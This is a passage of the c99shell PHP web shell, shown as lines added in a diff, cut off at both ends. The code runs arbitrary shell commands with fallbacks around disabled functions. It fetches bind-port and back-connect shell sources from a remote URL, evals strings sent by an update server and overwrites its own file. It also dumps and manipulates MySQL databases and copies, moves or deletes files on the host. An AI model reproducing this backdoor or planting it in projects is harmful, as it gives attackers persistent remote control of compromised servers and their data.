str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + $sess_data["copy"] = array_unique($sess_data["copy"]); + $sess_data["cut"] = array_unique($sess_data["cut"]); + sort($sess_data["copy"]); + sort($sess_data["cut"]); + if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} + else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} +} +} +c99_buff_prepare(); +if (!function_exists("c99_sess_put")) +{ +function c99_sess_put($data) +{ + global $sess_cookie; + global $sess_data; + c99_buff_prepare(); + $sess_data = $data; + $data = serialize($data); + setcookie($sess_cookie,$data); +} +} +foreach (array("sort","sql_sort") as $v) +{ + if (!empty($_GET[$v])) {$$v = $_GET[$v];} + if (!empty($_POST[$v])) {$$v = $_POST[$v];} +} +if ($sort_save) +{ + if (!empty($sort)) {setcookie("sort",$sort);} + if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);} +} +if (!function_exists("str2mini")) +{ +function str2mini($content,$len) +{ + if (strlen($content) > $len) + { + $len = ceil($len/2) - 2; + return substr($content, 0,$len)."...".substr($content,-$len); + } + else {return $content;} +} +} +if (!function_exists("view_size")) +{ +function view_size($size) +{ + if (!is_numeric($size)) {return false;} + else + { + if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} + elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} + elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} + else {$size = $size . " B";} + return $size; + } +} +} +if (!function_exists("fs_copy_dir")) +{ +function fs_copy_dir($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($o = readdir($h)) !== false) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + if (!$ret) {return $ret;} + } + } + closedir($h); + return true; +} +} +if (!function_exists("fs_copy_obj")) +{ +function fs_copy_obj($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (!is_dir(dirname($t))) {mkdir(dirname($t));} + if (is_dir($d)) + { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_copy_dir($d,$t); + } + elseif (is_file($d)) {return copy($d,$t);} + else {return false;} +} +} +if (!function_exists("fs_move_dir")) +{ +function fs_move_dir($d,$t) +{ + $h = opendir($d); + if (!is_dir($t)) {mkdir($t);} + while (($o = readdir($h)) !== false) + { + if (($o != ".") and ($o != "..")) + { + $ret = true; + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = false;}} + if (!$ret) {return $ret;} + } + } + closedir($h); + return true; +} +} +if (!function_exists("fs_move_obj")) +{ +function fs_move_obj($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (is_dir($d)) + { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_move_dir($d,$t); + } + elseif (is_file($d)) + { + if(copy($d,$t)) {return unlink($d);} + else {unlink($t); return false;} + } + else {return false;} +} +} +if (!function_exists("fs_rmdir")) +{ +function fs_rmdir($d) +{ + $h = opendir($d); + while (($o = readdir($h)) !== false) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.$o)) {unlink($d.$o);} + else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} + } + } + closedir($h); + rmdir($d); + return !is_dir($d); +} +} +if (!function_exists("fs_rmobj")) +{ +function fs_rmobj($o) +{ + $o = str_replace("\\",DIRECTORY_SEPARATOR,$o); + if (is_dir($o)) + { + if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} + return fs_rmdir($o); + } + elseif (is_file($o)) {return unlink($o);} + else {return false;} +} +} +if (!function_exists("myshellexec")) +{ +function myshellexec($cmd) +{ + global $disablefunc; + $result = ""; + if (!empty($cmd)) + { + if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} + elseif (($result = `$cmd`) !== false) {} + elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_resource($fp = popen($cmd,"r"))) + { + $result = ""; + while(!feof($fp)) {$result .= fread($fp,1024);} + pclose($fp); + } + } + return $result; +} +} +if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}} +if (!function_exists("view_perms")) +{ +function view_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$type = "s";} + elseif (($mode & 0x4000) === 0x4000) {$type = "d";} + elseif (($mode & 0xA000) === 0xA000) {$type = "l";} + elseif (($mode & 0x8000) === 0x8000) {$type = "-";} + elseif (($mode & 0x6000) === 0x6000) {$type = "b";} + elseif (($mode & 0x2000) === 0x2000) {$type = "c";} + elseif (($mode & 0x1000) === 0x1000) {$type = "p";} + else {$type = "?";} + + $owner["read"] = ($mode & 00400)?"r":"-"; + $owner["write"] = ($mode & 00200)?"w":"-"; + $owner["execute"] = ($mode & 00100)?"x":"-"; + $group["read"] = ($mode & 00040)?"r":"-"; + $group["write"] = ($mode & 00020)?"w":"-"; + $group["execute"] = ($mode & 00010)?"x":"-"; + $world["read"] = ($mode & 00004)?"r":"-"; + $world["write"] = ($mode & 00002)? "w":"-"; + $world["execute"] = ($mode & 00001)?"x":"-"; + + if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} + if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} + if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} + + return $type.join("",$owner).join("",$group).join("",$world); +} +} +if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return false;}} +if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return false;}} +if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return false;}} +if (!function_exists("parse_perms")) +{ +function parse_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$t = "s";} + elseif (($mode & 0x4000) === 0x4000) {$t = "d";} + elseif (($mode & 0xA000) === 0xA000) {$t = "l";} + elseif (($mode & 0x8000) === 0x8000) {$t = "-";} + elseif (($mode & 0x6000) === 0x6000) {$t = "b";} + elseif (($mode & 0x2000) === 0x2000) {$t = "c";} + elseif (($mode & 0x1000) === 0x1000) {$t = "p";} + else {$t = "?";} + $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; + $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; + $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; + return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); +} +} +if (!function_exists("parsesort")) +{ +function parsesort($sort) +{ + $one = intval($sort); + $second = substr($sort,-1); + if ($second != "d") {$second = "a";} + return array($one,$second); +} +} +if (!function_exists("view_perms_color")) +{ +function view_perms_color($o) +{ + if (!is_readable($o)) {return "".view_perms(fileperms($o))."";} + elseif (!is_writable($o)) {return "".view_perms(fileperms($o))."";} + else {return "".view_perms(fileperms($o))."";} +} +} +if (!function_exists("c99getsource")) +{ +function c99getsource($fn) +{ + global $c99sh_sourcesurl; + $array = array( + "c99sh_bindport.pl" => "c99sh_bindport_pl.txt", + "c99sh_bindport.c" => "c99sh_bindport_c.txt", + "c99sh_backconn.pl" => "c99sh_backconn_pl.txt", + "c99sh_backconn.c" => "c99sh_backconn_c.txt", + "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt", + "c99sh_datapipe.c" => "c99sh_datapipe_c.txt", + ); + $name = $array[$fn]; + if ($name) {return file_get_contents($c99sh_sourcesurl.$name);} + else {return false;} +} +} +if (!function_exists("c99sh_getupdate")) +{ +function c99sh_getupdate($update = true) +{ + $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&"; + $data = @file_get_contents($url); + if (!$data) {return "Can't connect to update-server!";} + else + { + $data = ltrim($data); + $string = substr($data,3,ord($data{2})); + if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return false;} + if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";} + if ($data{0} == "\x99" and $data{1} == "\x03") + { + $string = explode("\x01",$string); + if ($update) + { + $confvars = array(); + $sourceurl = $string[0]; + $source = file_get_contents($sourceurl); + if (!$source) {return "Can't fetch update!";} + else + { + $fp = fopen(__FILE__,"w"); + if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c99shell.php manually here.";} + else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";} + } + } + else {return "New version are available: ".$string[1];} + } + elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;} + else {return "Error in protocol: segmentation failed! (".$data.") ";} + } +} +} +if (!function_exists("mysql_dump")) +{ +function mysql_dump($set) +{ + global $shver; + $sock = $set["sock"]; + $db = $set["db"]; + $print = $set["print"]; + $nl2br = $set["nl2br"]; + $file = $set["file"]; + $add_drop = $set["add_drop"]; + $tabs = $set["tabs"]; + $onlytabs = $set["onlytabs"]; + $ret = array(); + $ret["err"] = array(); + if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} + if (empty($db)) {$db = "db";} + if (empty($print)) {$print = 0;} + if (empty($nl2br)) {$nl2br = 0;} + if (empty($add_drop)) {$add_drop = true;} + if (empty($file)) + { + $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; + } + if (!is_array($tabs)) {$tabs = array();} + if (empty($add_drop)) {$add_drop = true;} + if (sizeof($tabs) == 0) + { + // retrive tables-list + $res = mysql_query("SHOW TABLES FROM ".$db, $sock); + if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} + } + $out = "# Dumped by C99Shell.SQL v. ".$shver." +# Home page: http://ccteam.ru +# +# Host settings: +# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." +# Date: ".date("d.m.Y H:i:s")." +# DB: \"".$db."\" +#--------------------------------------------------------- +"; + $c = count($onlytabs); + foreach($tabs as $tab) + { + if ((in_array($tab,$onlytabs)) or (!$c)) + { + if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} + // recieve query for create table structure + $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); + if (!$res) {$ret["err"][] = mysql_smarterror();} + else + { + $row = mysql_fetch_row($res); + $out .= $row["1"].";\n\n"; + // recieve table variables + $res = mysql_query("SELECT * FROM `$tab`", $sock); + if (mysql_num_rows($res) > 0) + { + while ($row = mysql_fetch_assoc($res)) + { + $keys = implode("`, `", array_keys($row)); + $values = array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = implode("', '", $values); + $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; + $out .= $sql; + } + } + } + } + } + $out .= "#---------------------------------------------------------------------------------\n\n"; + if ($file) + { + $fp = fopen($file, "w"); + if (!$fp) {$ret["err"][] = 2;} + else + { + fwrite ($fp, $out); + fclose ($fp); + } + } + if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} + return $out; +} +} +if (!function_exists("mysql_buildwhere")) +{ +function mysql_buildwhere($array,$sep=" and",$functs=array()) +{ + if (!is_array($array)) {$array = array();} + $result = ""; + foreach($array as $k=>$v) + { + $value = ""; + if (!empty($functs[$k])) {$value .= $functs[$k]."(";} + $value .= "'".addslashes($v)."'"; + if (!empty($functs[$k])) {$value .= ")";} + $result .= "`".$k."` = ".$value.$sep; + } + $result = substr($result,0,strlen($result)-strlen($sep)); + return $result; +} +} +if (!function_exists("mysql_fetch_all")) +{ +function mysql_fetch_all($query,$sock) +{ + if ($sock) {$result = mysql_query($query,$sock);} + else {$result = mysql_query($query);} + $array = array(); + while ($row = mysql_fetch_array($result)) {$array[] = $row;} + mysql_free_result($result); + return $array; +} +} +if (!function_exists("mysql_smarterror")) +{ +function mysql_smarterror($type,$sock) +{ + if ($sock) {$error = mysql_error($sock);} + else {$error = mysql_error();} + $error = htmlspecialchars($error); + return $error; +} +} +if (!function_exists("mysql_query_form")) +{ +function mysql_query_form() +{ + global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
    ".$sql_query_error."
    ";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) + { + echo ""; + if ($tbl_struct) + { + echo "
    "; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":



     
    Fields:
    "; + foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» ".$name."
    ";} + echo "
    "; + } + } + if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} +} +} +if (!function_exists("mysql_create_db")) +{ +function mysql_create_db($db,$sock="") +{ + $sql = "CREATE DATABASE `".addslashes($db)."`;"; + if ($sock) {return mysql_query($sql,$sock);} + else {return mysql_query($sql);} +} +} +if (!function_exists("mysql_query_parse")) +{ +function mysql_query_parse($query) +{ + $query = trim($query); + $arr = explode (" ",$query); + /*array array() + { + "METHOD"=>array(output_type), + "METHOD1"... + ... + } + if output_type == 0, no output, + if output_type == 1, no output if no error + if output_type == 2, output without control-buttons + if output_type == 3, output with control-buttons + */ + $types = array( + "SELECT"=>array(3,1), + "SHOW"=>array(2,1), + "DELETE"=>array(1), + "DROP"=>array(1) + ); + $result = array(); + $op = strtoupper($arr[0]); + if (is_array($types[$op])) + { + $result["propertions"] = $types[$op]; + $result["query"] = $query; + if ($types[$op] == 2) + { + foreach($arr as $k=>$v) + { + if (strtoupper($v) == "LIMIT") + { + $result["limit"] = $arr[$k+1]; + $result["limit"] = explode(",",$result["limit"]); + if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} + unset($arr[$k],$arr[$k+1]); + } + } + } + } + else {return false;} +} +} +if (!function_exists("c99fsearch")) +{ +function c99fsearch($d) +{ + global $found; + global $found_d; + global $found_f; + global $search_i_f; + global $search_i_d; + global $a; + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($f = readdir($h)) !== false) + { + if($f != "." && $f != "..") + { + $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== false) || ($a["name_regexp"] and ereg($a["name"],$f)); + if (is_dir($d.$f)) + { + $search_i_d++; + if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} + if (!is_link($d.$f)) {c99fsearch($d.$f);} + } + else + { + $search_i_f++; + if ($bool) + { + if (!empty($a["text"])) + { + $r = @file_get_contents($d.$f); + if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} + if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} + if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} + else {$bool = strpos(" ".$r,$a["text"],1);} + if ($a["text_not"]) {$bool = !$bool;} + if ($bool) {$found[] = $d.$f; $found_f++;} + } + else {$found[] = $d.$f; $found_f++;} + } + } + } + } + closedir($h); +} +} +if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}} +//Sending headers +@ob_start(); +@ob_implicit_flush(0); +function onphpshutdown() +{ + global $gzipencode,$ft; + if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) + { + $v = @ob_get_contents(); + @ob_end_clean(); + @ob_start("ob_gzHandler"); + echo $v; + @ob_end_flush(); + } +} +function c99shexit() +{ + onphpshutdown(); + exit; +} +header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); +header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); +header("Cache-Control: no-store, no-cache, must-revalidate"); +header("Cache-Control: post-check=0, pre-check=0", false); +header("Pragma: no-cache"); +if (empty($tmpdir)) +{ + $tmpdir = ini_get("upload_tmp_dir"); + if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} +} +$tmpdir = realpath($tmpdir); +$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); +if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} +if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} +else {$tmpdir_logs = realpath($tmpdir_logs);} +if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") +{ + $safemode = true; + $hsafemode = "ON (secure)"; +} +else {$safemode = false; $hsafemode = "OFF (not secure)";} +$v = @ini_get("open_basedir"); +if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "".$v."";} +else {$openbasedir = false; $hopenbasedir = "OFF (not secure)";} +$sort = htmlspecialchars($sort); +if (empty($sort)) {$sort = $sort_default;} +$sort[1] = strtolower($sort[1]); +$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); +if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();} +$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"PHP/".phpversion()."",htmlspecialchars($DISP_SERVER_SOFTWARE)); +@ini_set("highlight.bg",$highlight_bg); //FFFFFF +@ini_set("highlight.comment",$highlight_comment); //#FF8000 +@ini_set("highlight.default",$highlight_default); //#0000BB +@ini_set("highlight.html",$highlight_html); //#000000 +@ini_set("highlight.keyword",$highlight_keyword); //#007700 +@ini_set("highlight.string",$highlight_string); //#DD0000 +if (!is_array($actbox)) {$actbox = array();} +$dspact = $act = htmlspecialchars($act); +$disp_fullpath = $ls_arr = $notls = null; +$ud = urlencode($d); +?><?php echo getenv("HTTP_HOST"); ?> - c99shell

    !C99Shell v. !

    Software:  

    uname -a: ",1); ?> 

    ",1);} else {echo get_current_user();} ?> 

    Safe-mode: 

    ".htmlspecialchars($b).DIRECTORY_SEPARATOR.""; + $i++; +} +echo "   "; +if (is_writable($d)) +{ + $wd = true; + $wdt = "[ ok ]"; + echo "".view_perms(fileperms($d)).""; +} +else +{ + $wd = false; + $wdt = "[ Read-Only ]"; + echo "".view_perms_color($d).""; +} +if (is_callable("disk_free_space")) +{ + $free = disk_free_space($d); + $total = disk_total_space($d); + if ($free === false) {$free = 0;} + if ($total === false) {$total = 0;} + if ($free < 0) {$free = 0;} + if ($total < 0) {$total = 0;} + $used = $total-$free; + $free_percent = round(100/($total/$free),2); + echo "
    Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)"; +} +echo "
    "; +$letters = ""; +if ($win) +{ + $v = explode("\\",$d); + $v = $v[0]; + foreach (range("a","z") as $letter) + { + $bool = $isdiskette = in_array($letter,$safemode_diskettes); + if (!$bool) {$bool = is_dir($letter.":\\");} + if ($bool) + { + $letters .= "[ "; + if ($letter.":" != $v) {$letters .= $letter;} + else {$letters .= "".$letter."";} + $letters .= " ] "; + } + } + if (!empty($letters)) {echo "Detected drives: ".$letters."
    ";} +} +if (count($quicklaunch) > 0) +{ + foreach($quicklaunch as $item) + { + $item[1] = str_replace("%d",urlencode($d),$item[1]); + $item[1] = str_replace("%sort",$sort,$item[1]); + $v = realpath($d.".."); + if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} + $item[1] = str_replace("%upd",urlencode($v),$item[1]); + echo "".$item[0]."    "; + } +} +echo "


    "; +if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "
    ".$donated_html."

    ";} +echo ""; + $line = explode(" ",$line); + $line[10] = join(" ",array_slice($line,10)); + $line = array_slice($line,0,11); + if ($line[0] == get_current_user()) {$line[0] = "".$line[0]."";} + $line[] = "KILL"; + $prcs[] = $line; + echo ""; + } + } + } + else + { + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + $ret = convert_cyr_string($ret,"d","w"); + $stack = explode("\n",$ret); + unset($stack[0],$stack[2]); + $stack = array_values($stack); + $head = explode(" ",$stack[0]); + $head[1] = explode(" ",$head[1]); + $head[1] = $head[1][0]; + $stack = array_slice($stack,1); + unset($head[2]); + $head = array_values($head); + if ($parsesort[1] != "a") {$y = "";} + else {$y = "";} + if ($k > count($head)) {$k = count($head)-1;} + for($i=0;$i".trim($head[$i])."";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) + { + echo ""; + $line = explode(" ",$line); + $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]); + $line[2] = intval(str_replace(" ","",$line[2]))*1024; + $prcs[] = $line; + echo ""; + } + } + } + $head[$k] = "".$head[$k]."".$y; + $v = $processes_sort[0]; + usort($prcs,"tabsort"); + if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);} + $tab = array(); + $tab[] = $head; + $tab = array_merge($tab,$prcs); + echo "
    "; +if ($act == "") {$act = $dspact = "ls";} +if ($act == "sql") +{ + $sql_surl = $surl."act=sql"; + if ($sql_login) {$sql_surl .= "&sql_login=".urlencode($sql_login);} + if ($sql_passwd) {$sql_surl .= "&sql_passwd=".urlencode($sql_passwd);} + if ($sql_server) {$sql_surl .= "&sql_server=".urlencode($sql_server);} + if ($sql_port) {$sql_surl .= "&sql_port=".urlencode($sql_port);} + if ($sql_db) {$sql_surl .= "&sql_db=".urlencode($sql_db);} + $sql_surl .= "&"; + //echo "

    Attention! SQL-Manager is NOT ready module! Don't reports bugs.

    "; + echo ""; + if (!$sql_sock) {?>"; + } + echo "
    "; + if ($sql_server) + { + $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd); + $err = mysql_smarterror(); + @mysql_select_db($sql_db,$sql_sock); + if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();} + } + else {$sql_sock = false;} + echo "SQL Manager:
    "; + if (!$sql_sock) + { + if (!$sql_server) {echo "NO CONNECTION";} + else {echo "
    Can't connect
    "; echo "".$err."";} + } + else + { + $sqlquicklaunch = array(); + $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); + $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)); + $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); + $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); + $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); + $sqlquicklaunch[] = array("Logout",$surl."act=sql"); + echo "
    MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")
    "; + if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} + echo "
    "; + } + echo "
    i
  • If login is null, login is owner of process.
  • If host is null, host is localhost
  • If port is null, port is 3306 (default)
  • Home
    "; + $result = mysql_list_tables($sql_db); + if (!$result) {echo mysql_smarterror();} + else + { + echo "---[ ".htmlspecialchars($sql_db)." ]---
    "; + $c = 0; + while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "» ".htmlspecialchars($row[0])." (".$count_row[0].")
    "; mysql_free_result($count); $c++;} + if (!$c) {echo "No tables found in database.";} + } + } + else + { + echo "
     Please, fill the form:
    UsernamePassword Database 
    HostPORT
    Home
    "; + $result = mysql_list_dbs($sql_sock); + if (!$result) {echo mysql_smarterror();} + else + { + echo "

    Please, select database
    "; + //Start center panel + $diplay = true; + if ($sql_db) + { + if (!is_numeric($c)) {$c = 0;} + if ($c == 0) {$c = "no";} + echo "
    There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").
    "; + if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} + echo "
    "; + $acts = array("","dump"); + if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} + elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} + elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} + elseif ($sql_tbl_act == "insert") + { + if ($sql_tbl_insert_radio == 1) + { + $keys = ""; + $akeys = array_keys($sql_tbl_insert); + foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} + if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} + $values = ""; + $i = 0; + foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} + if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} + $sql_query = 